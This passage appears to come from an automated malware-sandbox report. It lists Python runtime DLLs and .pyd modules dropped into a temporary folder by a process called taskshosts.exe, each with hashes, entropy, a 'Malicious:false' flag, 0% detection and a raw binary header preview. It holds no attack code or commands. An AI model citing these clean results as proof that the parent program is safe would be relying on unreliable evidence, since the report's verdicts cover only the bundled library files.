                                                                                                                                            Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........R?..3Q..3Q..3Q..K...3Q.FP..3Q.FT..3Q.FU..3Q.FR..3Q.hFP..3Q..XP..3Q..3P.3Q.hFY..3Q.hFQ..3Q.hF...3Q.hFS..3Q.Rich.3Q.........................PE..L...d:-a...........!.....f...d.......e..............................................N.....@.............................P...P...d......................................T...........................H...@............................................text...)e.......f.................. ..`.rdata...8.......:...j..............@..@.data...............................@....rsrc...............................@..@.reloc..............................@..B........................................................................................................................................................................................................................................................................................

                                                                                                                                            C:\Users\user\AppData\Local\Temp\_MEI80162\_bz2.pyd

                                                                                                                                            Download File
                                                                                                                                            Process:C:\Users\user\AppData\Local\Programs\Common\taskshosts.exe
                                                                                                                                            File Type:PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
                                                                                                                                            Category:dropped
                                                                                                                                            Size (bytes):78568
                                                                                                                                            Entropy (8bit):6.692548823172262
                                                                                                                                            Encrypted:false
                                                                                                                                            SSDEEP:1536:2whkLX4/bkMzMIXSycT+ar1AS8bVMS4BpI8MV55CbyjvU:25LEkMzvX2DOlbVMS4BpI8MVeWU
                                                                                                                                            MD5:9137B258EAF602482EB7DFDEEDFDF795
                                                                                                                                            SHA1:4AA311984C98ACF024AC446C434905864E7BBBEB
                                                                                                                                            SHA-256:3FF08CFA9F6687D68D78FE1A5C0AF6E5396E6FE506C14D23C538316CCA71A6AB
                                                                                                                                            SHA-512:79493AB0254A6CB56F998BBBC63F5D471E0A3F8709E745EE0EB0DF5D8DC6222EF38EA262A97907BB06281B3E8D6572286A0DF5E8D82F984878263720F0FCB8E6
                                                                                                                                            Malicious:false
                                                                                                                                            Antivirus:
                                                                                                                                            • Antivirus: ReversingLabs, Detection: 0%
                                                                                                                                            Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......j..:...i...i...i'.wi$..i|..h,..iH..i-..i|..h"..i|..h$..i|..h,..i...h-..i:..h,..i...is..i...h&..i...h/..i...i/..i...h/..iRich...i........................PE..L....:-a...........!.........L...............................................P............@......................... ...H...h........0.......................@......@...T...............................@............................................text............................... ..`.rdata..X1.......2..................@..@.data...H.... ......................@....rsrc........0......................@..@.reloc.......@......................@..B................................................................................................................................................................................................................................................................................

                                                                                                                                            C:\Users\user\AppData\Local\Temp\_MEI80162\_ctypes.pyd

                                                                                                                                            Download File
                                                                                                                                            Process:C:\Users\user\AppData\Local\Programs\Common\taskshosts.exe
                                                                                                                                            File Type:PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
                                                                                                                                            Category:dropped
                                                                                                                                            Size (bytes):116968
                                                                                                                                            Entropy (8bit):6.58820716147258
                                                                                                                                            Encrypted:false
                                                                                                                                            SSDEEP:3072:qeLRlXrhZu6mLXV0Q/Z6flqCBAlI8BPW8srEy:qeLrX9JiCQ/Z6fMC6uEy
                                                                                                                                            MD5:DE2F88B18FABE8586C38074B6FB80873
                                                                                                                                            SHA1:CF4B533FFEB9792B33516EC05D3375260FF32B98
                                                                                                                                            SHA-256:F5480114CF3118E561C4DC55CB733F9D06FAE897875D91BB324263B4AEDD31B9
                                                                                                                                            SHA-512:3D89CCC9F9D6BCA35F2CE5DBDAFF2FD571C3E4C89056AEC4DE97466AEA49D5BD9C7DE0A0D345F249F1A33B43597F9C3A1687DA246F6C832434391638A10DCD04
                                                                                                                                            Malicious:false
                                                                                                                                            Antivirus:
                                                                                                                                            • Antivirus: ReversingLabs, Detection: 0%
                                                                                                                                            Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......{...?|.?|.?|.6.[.9|.m..=|.m..4|.m..5|.m..:|....=|.+..>|.+..9|....<|.?|..|.....9|....>|...7.>|....>|.Rich?|.................PE..L...y:-a...........!.........................0............................................@..........................f......$g......................................xa..T............................a..@............0...............................text............................... ..`.rdata...N...0...P..................@..@.data................f..............@....rsrc...............................@..@.reloc..............................@..B................................................................................................................................................................................................................................................................................

                                                                                                                                            C:\Users\user\AppData\Local\Temp\_MEI80162\_decimal.pyd

                                                                                                                                            Download File
                                                                                                                                            Process:C:\Users\user\AppData\Local\Programs\Common\taskshosts.exe
                                                                                                                                            File Type:PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
                                                                                                                                            Category:dropped
                                                                                                                                            Size (bytes):230632
                                                                                                                                            Entropy (8bit):6.857972259618523
                                                                                                                                            Encrypted:false
                                                                                                                                            SSDEEP:6144:7+CdBO+WLvRxuFcQAHe0nDx3tUftGuq6xx3XMW5gZrWCi7:7/7O/LRxuFcQYlDx3taLOWCw
                                                                                                                                            MD5:334D5A5D7B73C7D157762EB290F3AC48
                                                                                                                                            SHA1:716AE2CE10270CB474A6B1787E5C98662AE902EC
                                                                                                                                            SHA-256:0AB918574B6404FC37B577E2FDDA8B1515FBF198E86C10C6011F708E88A79EF7
                                                                                                                                            SHA-512:E830002BD4DDA7D55A1807EA2380A3A46BEF6CAF7DFA5D5028306076EA3B3BF56446196842B926D77244B8B7571AC489109737D0C5F8855896202D376F39297A
                                                                                                                                            Malicious:false
                                                                                                                                            Antivirus:
                                                                                                                                            • Antivirus: ReversingLabs, Detection: 0%
                                                                                                                                            Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......?..c{..0{..0{..0r.:0u..0).1y..0).1w..0).1q..0).1...0..1x..0o.1y..0{..0.0..1t..0..1z..0..V0z..0..1z..0Rich{..0........PE..L...i:-a...........!................................................................AU....@.............................P............`...............h.......p..."...)..T...........................@*..@............................................text.............................. ..`.rdata..............................@..@.data........@.......(..............@....rsrc........`.......:..............@..@.reloc..."...p...$...D..............@..B........................................................................................................................................................................................................................................................................................................

                                                                                                                                            C:\Users\user\AppData\Local\Temp\_MEI80162\_hashlib.pyd

                                                                                                                                            Download File
                                                                                                                                            Process:C:\Users\user\AppData\Local\Programs\Common\taskshosts.exe
                                                                                                                                            File Type:PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
                                                                                                                                            Category:dropped
                                                                                                                                            Size (bytes):52456
                                                                                                                                            Entropy (8bit):6.648093374061067
                                                                                                                                            Encrypted:false
                                                                                                                                            SSDEEP:768:GFRegVllNvo/j+X+oOPCGGtQhI8YIHezUl9wJDG4y3hHA:GRegvre+Or6GGChI8YIHr2yFA
                                                                                                                                            MD5:3AD5E39CBE6354BB1CE82E29D4B2C072
                                                                                                                                            SHA1:C4A18CE9E803CA6A7E33F1BEF422F5006DF651FF
                                                                                                                                            SHA-256:EDDEEDD5FD8A1C49ECAAB51FF5117D9FB1FED5637E8CA31F35698BC6D68CA39D
                                                                                                                                            SHA-512:A9ECAB892469C79B50B7C1C79394BB96FCB10BEAB03114961BE5C0C05622765C0F105856065988ED31A7D21911D91C7A5FCDF4A9D33AC35AB99BA5550E91A823
                                                                                                                                            Malicious:false
                                                                                                                                            Antivirus:
                                                                                                                                            • Antivirus: ReversingLabs, Detection: 0%
                                                                                                                                            Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$..................E..............................................>.................).........Rich............................PE..L....:-a...........!.....Z...V.......Y.......p......................................`<....@......................... ...P...p...x...............................$...h...T...............................@............p..0............................text...)Y.......Z.................. ..`.rdata...3...p...4...^..............@..@.data...@...........................@....rsrc...............................@..@.reloc..$...........................@..B................................................................................................................................................................................................................................................................................

                                                                                                                                            C:\Users\user\AppData\Local\Temp\_MEI80162\_lzma.pyd

                                                                                                                                            Download File
                                                                                                                                            Process:C:\Users\user\AppData\Local\Programs\Common\taskshosts.exe
                                                                                                                                            File Type:PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
                                                                                                                                            Category:dropped
                                                                                                                                            Size (bytes):162536
                                                                                                                                            Entropy (8bit):6.9618412972272035
                                                                                                                                            Encrypted:false
                                                                                                                                            SSDEEP:3072:KsdGFMyIenRQWtwjETZZ2lHEH60E9DjX9WAiuwCpMxIl3YxIuG17lzHfq9mNoRGU:Ky56RQWtwjEODjX/gQl3HtiYOc7IqvXu
                                                                                                                                            MD5:02A95C6BD7852E9E5FAF24A3375D30EA
                                                                                                                                            SHA1:5DAD699FD8103183B7A5E8B06498D8F6997A8898
                                                                                                                                            SHA-256:E1B8C6D535E5070BB350799953A86AE7FF25FE90CEC81E20A18834CB6D503465
                                                                                                                                            SHA-512:CE28BA0A7C6EFF792CC8E2B9A9A9C3357A82AB0FBDC5B02837CED666CF543D41E79503AD1155D96B412D85484174DAE5DDA6B5C33A5EEC62606CCB95720E43F8
                                                                                                                                            Malicious:false
                                                                                                                                            Antivirus:
                                                                                                                                            • Antivirus: ReversingLabs, Detection: 0%
                                                                                                                                            Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.........,...B...B...B.......B...C...B...G...B...F...B...A...B...C...B...C...B...C...B...J...B...B...B.......B...@...B.Rich..B.................PE..L....:-a...........!................[.....................................................@..........................D..L....D..x....`...............^.......p..D....?..T...........................8@..@............................................text............................... ..`.rdata.............................@..@.data...`....P.......B..............@....rsrc........`.......F..............@..@.reloc..D....p.......P..............@..B................................................................................................................................................................................................................................................................................................

                                                                                                                                            C:\Users\user\AppData\Local\Temp\_MEI80162\_multiprocessing.pyd

                                                                                                                                            Download File
                                                                                                                                            Process:C:\Users\user\AppData\Local\Programs\Common\taskshosts.exe
                                                                                                                                            File Type:PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
                                                                                                                                            Category:dropped
                                                                                                                                            Size (bytes):27368
                                                                                                                                            Entropy (8bit):6.549414263488397
                                                                                                                                            Encrypted:false
                                                                                                                                            SSDEEP:768:HuDBfF4Cz7UfVqH+JxI8At42uDG4yjc/AdiYhHZ:Hu9fF4CPUfVqH+JxI8At42ayjc/ai8Z
                                                                                                                                            MD5:DD1C9450E9F4C33E47C364900D9A814D
                                                                                                                                            SHA1:E0BCD7DE6DF954309F226CA64390E95E41CECC69
                                                                                                                                            SHA-256:734AC43FD0DB3108D4BF1251F078F8F212B3B9A2DE1C46511AF7D6CA90EAF624
                                                                                                                                            SHA-512:A084F8119B99977077E3FE7B4E87722A2FE6D2C010604CFE4CE4E7A37AA621C2F974485700C969443E1B6C9AD466858607A239CC6DAD8668ECB7B61AFE98B19A
                                                                                                                                            Malicious:false
                                                                                                                                            Antivirus:
                                                                                                                                            • Antivirus: ReversingLabs, Detection: 0%
                                                                                                                                            Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.........pb..1..1..1..1..1...0...1...0..1...0..1...0...1v..0...1...0..1..1...1v..0...1v..0..1v..1..1v..0..1Rich..1........................PE..L...m:-a...........!....."...,......:........@............................................@.........................`J..`....J.......p...............N..........T....E..T............................F..@............@..d............................text...g!.......".................. ..`.rdata.......@.......&..............@..@.data...@....`.......:..............@....rsrc........p.......>..............@..@.reloc..T............H..............@..B........................................................................................................................................................................................................................................................................................

                                                                                                                                            C:\Users\user\AppData\Local\Temp\_MEI80162\_overlapped.pyd

                                                                                                                                            Download File
                                                                                                                                            Process:C:\Users\user\AppData\Local\Programs\Common\taskshosts.exe
                                                                                                                                            File Type:PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
                                                                                                                                            Category:dropped
                                                                                                                                            Size (bytes):39144
                                                                                                                                            Entropy (8bit):6.594969794994295
                                                                                                                                            Encrypted:false
                                                                                                                                            SSDEEP:768:fSq/1fbtTv2JknGAeTP5M8IYWn06IzLnnI9I8ttQDG4yfGhHl:KmD22nGNTxUn06IzLnI9I8ttcy+l
                                                                                                                                            MD5:A9E77439A38E66AB21DA99C5C00EE0F0
                                                                                                                                            SHA1:CD3CC2BEB2C5270F9A01BF95919C3F9C4A1F16D6
                                                                                                                                            SHA-256:70538FFEFDB2F6FF8C6F29EEAF5EE4197832E83476EAC6A648A4EB14E86E90FF
                                                                                                                                            SHA-512:5E5B27ECF6850EA7A300267B0B5EEB6F85AD003E9EE8FD13EB9B6350BD520295407D1F99BC33833A4BE1E78F4914B52F8ABC3C1F4297268B151DA1DD31BB10D3
                                                                                                                                            Malicious:false
                                                                                                                                            Antivirus:
                                                                                                                                            • Antivirus: ReversingLabs, Detection: 0%
                                                                                                                                            Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........h.P..i...i...i..q....i..|h...i..|l...i..|m...i..|j...i.{|h...i..bo...i..bh...i...h...i.{|a...i.{|i...i.{|....i.{|k...i.Rich..i.........PE..L...m:-a...........!.....<...@.......<.......P...........................................@......................... i..X...xi.......................|..............\d..T............................d..@............P...............................text...o;.......<.................. ..`.rdata...$...P...&...@..............@..@.data...$............f..............@....rsrc................j..............@..@.reloc...............t..............@..B................................................................................................................................................................................................................................................................................................

                                                                                                                                            C:\Users\user\AppData\Local\Temp\_MEI80162\_queue.pyd

                                                                                                                                            Download File
                                                                                                                                            Process:C:\Users\user\AppData\Local\Programs\Common\taskshosts.exe
                                                                                                                                            File Type:PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
                                                                                                                                            Category:dropped
                                                                                                                                            Size (bytes):26344
                                                                                                                                            Entropy (8bit):6.465416851591826
                                                                                                                                            Encrypted:false
                                                                                                                                            SSDEEP:768:cxz3Uvcqwbv6rhCGJklI8mU5DG4yihH8F:ct3UUqQyhCGJklI8mU7y68F
                                                                                                                                            MD5:A76C599AEA04E05E0D8FBD3E40C564FF
                                                                                                                                            SHA1:BD0992D395D4E2FD275C942DFA425A29333663BB
                                                                                                                                            SHA-256:5A9E30C9B0FC28E192B59930D70D4B212DBD96A14DE31D88B6F7E5C719E7B148
                                                                                                                                            SHA-512:1E3536C3F5DC439547C6F267A8F7F885E9B7F20F2A480B88DA83CB1336E25132BC4107F3C22F3FB7DE85FE762BC28D57182CF9A8CA881B3512905B1D5F5EAC66
                                                                                                                                            Malicious:false
                                                                                                                                            Antivirus:
                                                                                                                                            • Antivirus: ReversingLabs, Detection: 0%
                                                                                                                                            Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.........<..R..R..R......R..S..R..W..R..V..R..Q..R.h.S..R...S..R..S.R.h.Z..R.h.R..R.h...R.h.P..R.Rich.R.........................PE..L...o:-a...........!.........*...............0.......................................W....@......................... =..L...l=..d....`...............J.......p..l...H8..T............................8..@............0...............................text...9........................... ..`.rdata.......0......."..............@..@.data........P.......8..............@....rsrc........`.......<..............@..@.reloc..l....p.......F..............@..B........................................................................................................................................................................................................................................................................................

                                                                                                                                            C:\Users\user\AppData\Local\Temp\_MEI80162\_socket.pyd

                                                                                                                                            Download File
                                                                                                                                            Process:C:\Users\user\AppData\Local\Programs\Common\taskshosts.exe
                                                                                                                                            File Type:PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
                                                                                                                                            Category:dropped
                                                                                                                                            Size (bytes):71912
                                                                                                                                            Entropy (8bit):6.6304829026661345
                                                                                                                                            Encrypted:false
                                                                                                                                            SSDEEP:1536:XxYZ+3edCVrMD9f8+2eJiWnnCz6xlI8Bwvyj+u:BYZLdsMD9f8LeJiWnCz6xlI8Bwru
                                                                                                                                            MD5:6BA36034BC861F44E90F547C667DA40A
                                                                                                                                            SHA1:7FC6D70AC9C80E600B14760B47396369F1C3D9BE
                                                                                                                                            SHA-256:5A3E41A8C91EB5D81AC9D4A7477461414D5431754FFB9D6AD49369238D25FDD4
                                                                                                                                            SHA-512:AD49EBE8B11592088CCFDA6813DE3629C1C0EF6663D56724B6DB8F5B6B827B8CF28EF71DD7154C223F836059029CD25FF48E57EDB3D9B665157716172443B59F
                                                                                                                                            Malicious:false
                                                                                                                                            Antivirus:
                                                                                                                                            • Antivirus: ReversingLabs, Detection: 0%
                                                                                                                                            Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......y...=.=.=.4...9.o...?.o...1.o...7.o...<.....?.)...:.=.......<.....<...q.<.....<.Rich=.........................PE..L....:-a...........!.....x..........4w.......................................0......uJ....@.............................P.................................... ..........T...............................@............................................text....v.......x.................. ..`.rdata...`.......b...|..............@..@.data...@...........................@....rsrc...............................@..@.reloc....... ......................@..B........................................................................................................................................................................................................................................................................................

                                                                                                                                            C:\Users\user\AppData\Local\Temp\_MEI80162\_ssl.pyd

                                                                                                                                            Download File
                                                                                                                                            Process:C:\Users\user\AppData\Local\Programs\Common\taskshosts.exe
                                                                                                                                            File Type:PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
                                                                                                                                            Category:dropped
                                                                                                                                            Size (bytes):143080
                                                                                                                                            Entropy (8bit):6.491073634171029
                                                                                                                                            Encrypted:false
                                                                                                                                            SSDEEP:3072:Dd7tm9Bt+CDEcthX+w0/13yLjqvDWb56j8RpI8M7Y8IVQ:Ddxm9Xr+w0/13+qvDWba8R3LQ
                                                                                                                                            MD5:EEFFC18404F7E10E6BFC71C5984EA3E5
                                                                                                                                            SHA1:9291C1DD62135F7FDCD61DDE80EB4B2E8B96CA0A
                                                                                                                                            SHA-256:52891F8A9751C1DED6DEA7C7313F19287E936A248AFFDBE93BC9C857294C120B
                                                                                                                                            SHA-512:C4D1FE321B457EF4BA0E79E0B22DF62D3D981C9A42A29FD8370559FEFEE225BFE21F398DE2BB58C0E91468ED87D5FDB804A605B76204B99C9F88713F67A49B41
                                                                                                                                            Malicious:false
                                                                                                                                            Antivirus:
                                                                                                                                            • Antivirus: ReversingLabs, Detection: 0%
                                                                                                                                            Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........J...+...+...+...S$..+...^...+...^...+...^...+...^...+..J^...+...^...+...@...+...+...*..J^...+..J^...+..J^H..+..J^...+..Rich.+..........PE..L....:-a...........!.........P...............................................P............@.............................d...D................................ ..|#..(...T...............................@............................................text............................... ..`.rdata..............................@..@.data....K.......H..................@....rsrc...............................@..@.reloc..|#... ...$..................@..B................................................................................................................................................................................................................................................................................................

                                                                                                                                            C:\Users\user\AppData\Local\Temp\_MEI80162\_uuid.pyd

                                                                                                                                            Download File
                                                                                                                                            Process:C:\Users\user\AppData\Local\Programs\Common\taskshosts.exe
                                                                                                                                            File Type:PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
                                                                                                                                            Category:dropped
                                                                                                                                            Size (bytes):20712
                                                                                                                                            Entropy (8bit):6.48424389358467
                                                                                                                                            Encrypted:false
                                                                                                                                            SSDEEP:384:tD3fFhe0IjmyvNNdeTpI8DwzH6oDG4y8mKFcQhHI4:Jdhe9mTpI8DwzH1DG4yjehHI4
                                                                                                                                            MD5:2C4DBAA2151C458C8EEA5F37B2CFE673
                                                                                                                                            SHA1:72AEB5DE5E25E67F8F798AED198718B9C4A5CD97
                                                                                                                                            SHA-256:99DD17FE2D43ED007B301AA5CE80364F2C7D9BBD033E4CE0166DEFB23140DB38
                                                                                                                                            SHA-512:399491B8D9736732E404640216C8ECE073795F9966AE6D2ACFD6D64B7C6B35AB63C03287751C0AB46593B072C778E1D4051D667BA693ADBAFE0A15AE6E6019AA
                                                                                                                                            Malicious:false
                                                                                                                                            Antivirus:
                                                                                                                                            • Antivirus: ReversingLabs, Detection: 0%
                                                                                                                                            Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......}..9...9...9...0.!.;...k..;...k..2...k..3...k..8......;...-...<...9..........8......8.....M.8......8...Rich9...........................PE..L...x:-a...........!................P........0...............................p......TU....@..........................5..L...,6..x....P...............4.......`..P....1..T...........................p1..@............0...............................text............................... ..`.rdata.......0......................@..@.data........@.......$..............@....rsrc........P.......&..............@..@.reloc..P....`.......0..............@..B........................................................................................................................................................................................................................................................................................

                                                                                                                                            C:\Users\user\AppData\Local\Temp\_MEI80162\base_library.zip

                                                                                                                                            Download File
                                                                                                                                            Process:C:\Users\user\AppData\Local\Programs\Common\taskshosts.exe
                                                                                                                                            File Type:Zip archive data, at least v2.0 to extract, compression method=store
                                                                                                                                            Category:dropped
                                                                                                                                            Size (bytes):799949
                                                                                                                                            Entropy (8bit):5.485927763898022
                                                                                                                                            Encrypted:false
                                                                                                                                            SSDEEP:24576:1K738OQQcosQNRs54PK4ItIVwHLfVEhIESC/:1K738OfcosQNRs54PK4I7q
                                                                                                                                            MD5:A6277EDD815F1D33215C41309AA0A3B4
                                                                                                                                            SHA1:0522D880992F2BB46571E27610410A9D99B69984
                                                                                                                                            SHA-256:A6E24DEAB93CA92BB3118081E10987FB7078B0D249E38911BD0C429563941317
                                                                                                                                            SHA-512:AE83607B951996CC61BFC07AA6946BC8E6B409BC504AA92355C762420ECE2D69C2E11BB6C88D4CE81C8D0136AC82E1E04157ED02CDCA5B7D945D939D36C4AE39
                                                                                                                                            Malicious:false
                                                                                                                                            Preview:PK..........!...#............_bootlocale.pyca.......C.O.o..v.....................@....x...d.Z.d.d.l.Z.d.d.l.Z.e.j...d...r,d.d.d...Z.nHz.e.j...W.n2..e.yh......e.e.d...rZd.d.d...Z.n.d.d.d...Z.Y.n.0.d.d.d...Z.d.S.)...A minimal subset of the locale module used at interpreter startup.(imported by the _io module), in order to reduce startup time...Don't import directly from third-party code; use the `locale` module instead!......N..winTc....................C........t.j.j.r.d.S.t.....d...S.).N..UTF-8.........sys..flags..utf8_mode.._locale.._getdefaultlocale....do_setlocale..r......_bootlocale.py..getpreferredencoding...............r......getandroidapilevelc....................C........d.S.).Nr....r....r....r....r....r....r...............c....................C........t.j.j.r.d.S.d.d.l.}.|...|...S.).Nr....r......r....r....r......localer......r....r....r....r....r....r.....................c....................C....6...|.r.J...t.j.j.r.d.S.t...t.j...}.|.s2t.j.d.k.r2d.}.|.S.).Nr......darwin..r....

                                                                                                                                            C:\Users\user\AppData\Local\Temp\_MEI80162\libcrypto-1_1.dll

                                                                                                                                            Download File
                                                                                                                                            Process:C:\Users\user\AppData\Local\Programs\Common\taskshosts.exe
                                                                                                                                            File Type:PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
                                                                                                                                            Category:dropped
                                                                                                                                            Size (bytes):2265336
                                                                                                                                            Entropy (8bit):6.107347147299583
                                                                                                                                            Encrypted:false
                                                                                                                                            SSDEEP:49152:Tzq7OrIUW5FPdtvxE8IRHKY1CPwDv3uFfJuJy:Xq7OzUdfE8AHKY1CPwDv3uFfJ/
                                                                                                                                            MD5:31C2130F39942AC41F99C77273969CD7
                                                                                                                                            SHA1:540EDCFCFA75D0769C94877B451F5D0133B1826C
                                                                                                                                            SHA-256:DD55258272EEB8F2B91A85082887463D0596E992614213730000B2DBC164BCAD
                                                                                                                                            SHA-512:CB4E0B90EA86076BD5C904B46F6389D0FD4AFFFE0BD3A903C7FF0338C542797063870498E674F86D58764CDBB73B444D1DF4B4AA64F69F99B224E86DDAF74BB5
                                                                                                                                            Malicious:false
                                                                                                                                            Antivirus:
                                                                                                                                            • Antivirus: ReversingLabs, Detection: 0%
                                                                                                                                            Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......#.w9g..jg..jg..jn..js..j5..ke..j5..kl..j5..km..j5..km..js..kl..jg..j...j1..k...j1..kf..j1..jf..j1..kf..jRichg..j........................PE..L.....'a...........!.................f.......0................................#......"...@..............................h....!.T.....!.|............t".......".........8...............................@.............!..............................text...9........................... ..`.rdata...(...0...*..................@..@.data...4Y...`!......B!.............@....idata........!......X!.............@..@.00cfg........!......r!.............@..@.rsrc...|.....!......t!.............@..@.reloc........"......|!.............@..B................................................................................................................................................................................................................

                                                                                                                                            C:\Users\user\AppData\Local\Temp\_MEI80162\libffi-7.dll

                                                                                                                                            Download File
                                                                                                                                            Process:C:\Users\user\AppData\Local\Programs\Common\taskshosts.exe
                                                                                                                                            File Type:PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
                                                                                                                                            Category:dropped
                                                                                                                                            Size (bytes):29208
                                                                                                                                            Entropy (8bit):6.643623418348
                                                                                                                                            Encrypted:false
                                                                                                                                            SSDEEP:384:l69PtXvz8cLBN3gHhY4AFlfIvDzqig2c2LuRRClfW23JLURlV5uH+6nYPLxDG4yG:l65tXvz2CTIvy2c26A35qYvWDG4yG
                                                                                                                                            MD5:BC20614744EBF4C2B8ACD28D1FE54174
                                                                                                                                            SHA1:665C0ACC404E13A69800FAE94EFD69A41BDDA901
                                                                                                                                            SHA-256:0C7EC6DE19C246A23756B8550E6178AC2394B1093E96D0F43789124149486F57
                                                                                                                                            SHA-512:0C473E7070C72D85AE098D208B8D128B50574ABEBBA874DDA2A7408AEA2AABC6C4B9018801416670AF91548C471B7DD5A709A7B17E3358B053C37433665D3F6B
                                                                                                                                            Malicious:false
                                                                                                                                            Antivirus:
                                                                                                                                            • Antivirus: ReversingLabs, Detection: 0%
                                                                                                                                            Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......)..qm.."m.."m.."d.p"o.."?..#o.."...#n.."m.."I.."?..#f.."?..#g.."?..#n.."...#k.."...#l.."...#l.."...#l.."Richm.."................PE..L.....]...........!.....@...........E.......P......................................H.....@.........................pU.......X..P....................X.......p..<....R..............................0R..@............P...............................text...j>.......@.................. ..`.rdata..p....P.......D..............@..@.data........`.......R..............@....reloc..<....p.......T..............@..B................................................................................................................................................................................................................................................................................................................................................

                                                                                                                                            C:\Users\user\AppData\Local\Temp\_MEI80162\libssl-1_1.dll

                                                                                                                                            Download File
                                                                                                                                            Process:C:\Users\user\AppData\Local\Programs\Common\taskshosts.exe
                                                                                                                                            File Type:PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
                                                                                                                                            Category:dropped
                                                                                                                                            Size (bytes):544504
                                                                                                                                            Entropy (8bit):5.7541372304412945
                                                                                                                                            Encrypted:false
                                                                                                                                            SSDEEP:12288:OcwAbgOL9BmDy2pMcdmka42bJ8Hh9sa3MU2lvzJp:O4UOBBcF2b0hma8U2lvzJp
                                                                                                                                            MD5:8471E73A5594C8FBBB3A8B3DF4FB7372
                                                                                                                                            SHA1:488772CB5BBB50F14A4A9546051EDEF4AE75DD20
                                                                                                                                            SHA-256:380BB2C4CE42DD1EF77C33086CF95AA4FE50290A30849A3E77A18900141AF793
                                                                                                                                            SHA-512:24025B8F0CC076A6656EBA288F5850847C75F8581C9C3E36273350DB475050DEEE903D034AD130D56D1DEDE20C0D33B56B567C2EF72EB518F76D887F9254B11B
                                                                                                                                            Malicious:false
                                                                                                                                            Antivirus:
                                                                                                                                            • Antivirus: ReversingLabs, Detection: 0%
                                                                                                                                            Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$............^..^..^..E^..^..._..^..._..^..._..^..._..^..._..^..._..^..^9..^..._...^..._..^..)^..^..._..^Rich..^................PE..L...,.'a...........!.........4.......".......................................p...........@.........................`,...N........... ..s............2.......0...6......8...............................@............................................text...y........................... ..`.rdata..jj.......l..................@..@.data....;.......6...p..............@....idata...A.......B..................@..@.00cfg..............................@..@.rsrc...s.... ......................@..@.reloc..$>...0...@..................@..B................................................................................................................................................................................................................

                                                                                                                                            C:\Users\user\AppData\Local\Temp\_MEI80162\pyexpat.pyd

                                                                                                                                            Download File
                                                                                                                                            Process:C:\Users\user\AppData\Local\Programs\Common\taskshosts.exe
                                                                                                                                            File Type:PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
                                                                                                                                            Category:dropped
                                                                                                                                            Size (bytes):180968
                                                                                                                                            Entropy (8bit):6.670082335019216
                                                                                                                                            Encrypted:false
                                                                                                                                            SSDEEP:3072:lGGzH3PDa4Wa0hDVgoApEmP/JZR8x4Hm6EJNA3Rui/IddZaUTlI8BhNjV:xzH24Wa01AEa/JZVGDNA3Rui/AaUTbjV
                                                                                                                                            MD5:46C68BBCA8A86EA6AD9B0279DED140D4
                                                                                                                                            SHA1:1FA89E41A77C5BD30799B28BBE7B2FF6FCE5183A
                                                                                                                                            SHA-256:00DF0F266070208D7087D203F5FD06E91C47C9D5C8ED449690B9443F06C8D992
                                                                                                                                            SHA-512:E75E082FBFF3FA9B9848CA5693DE0D4C5074995F9E03EEDD26FC72C90FBD9D60E257E6ECE93F2A113C6DF6401930451DF462FD8D16D14E0D249A8BEB2055D0CB
                                                                                                                                            Malicious:false
                                                                                                                                            Antivirus:
                                                                                                                                            • Antivirus: ReversingLabs, Detection: 0%
                                                                                                                                            Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.........B...,...,...,.....,...-...,...)...,...(...,.../...,.X.-...,...-...,...-...,.X.$...,.X.,...,.X.....,.X.....,.Rich..,.........PE..L...u:-a...........!................E........ ............................................@..........................j..P...0k...................................$..(f..T............................f..@............ ...............................text............................... ..`.rdata...W... ...X..................@..@.data...h............j..............@....rsrc................v..............@..@.reloc...$.......&..................@..B........................................................................................................................................................................................................................................................................................................

                                                                                                                                            C:\Users\user\AppData\Local\Temp\_MEI80162\python39.dll

                                                                                                                                            Download File
                                                                                                                                            Process:C:\Users\user\AppData\Local\Programs\Common\taskshosts.exe
                                                                                                                                            File Type:PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
                                                                                                                                            Category:dropped
                                                                                                                                            Size (bytes):4497640
                                                                                                                                            Entropy (8bit):6.725954872872607
                                                                                                                                            Encrypted:false
                                                                                                                                            SSDEEP:49152:6UqQgnAHhsvhRLEmgRJEqdaNIuEBIv0BX+dCIqQKHaEMZnFPqYekTr+4mP6umenF:oaWhxKCqBI2O9qTHrMZ0Yu1P7n3zFX
                                                                                                                                            MD5:5BAFE23107E6DF19DE8F7AC9068ED26E
                                                                                                                                            SHA1:D2A88BEAF959BD5331948B03330C98FE8FA85C7C
                                                                                                                                            SHA-256:C1E5A847AE6AA9D9F42B482C7A20DCDC9DFE225F7186B0B01924225AA4E5E581
                                                                                                                                            SHA-512:1C2372DEBC0E2E53EA281798F15243294430E4E7E4D3B82E4AB998A1B7C77CAD68D50E196E37C6FF7BA83B08A12286AF5D2797BFA707AF5DAD180862CCE7EFC7
                                                                                                                                            Malicious:false
                                                                                                                                            Antivirus:
                                                                                                                                            • Antivirus: ReversingLabs, Detection: 0%
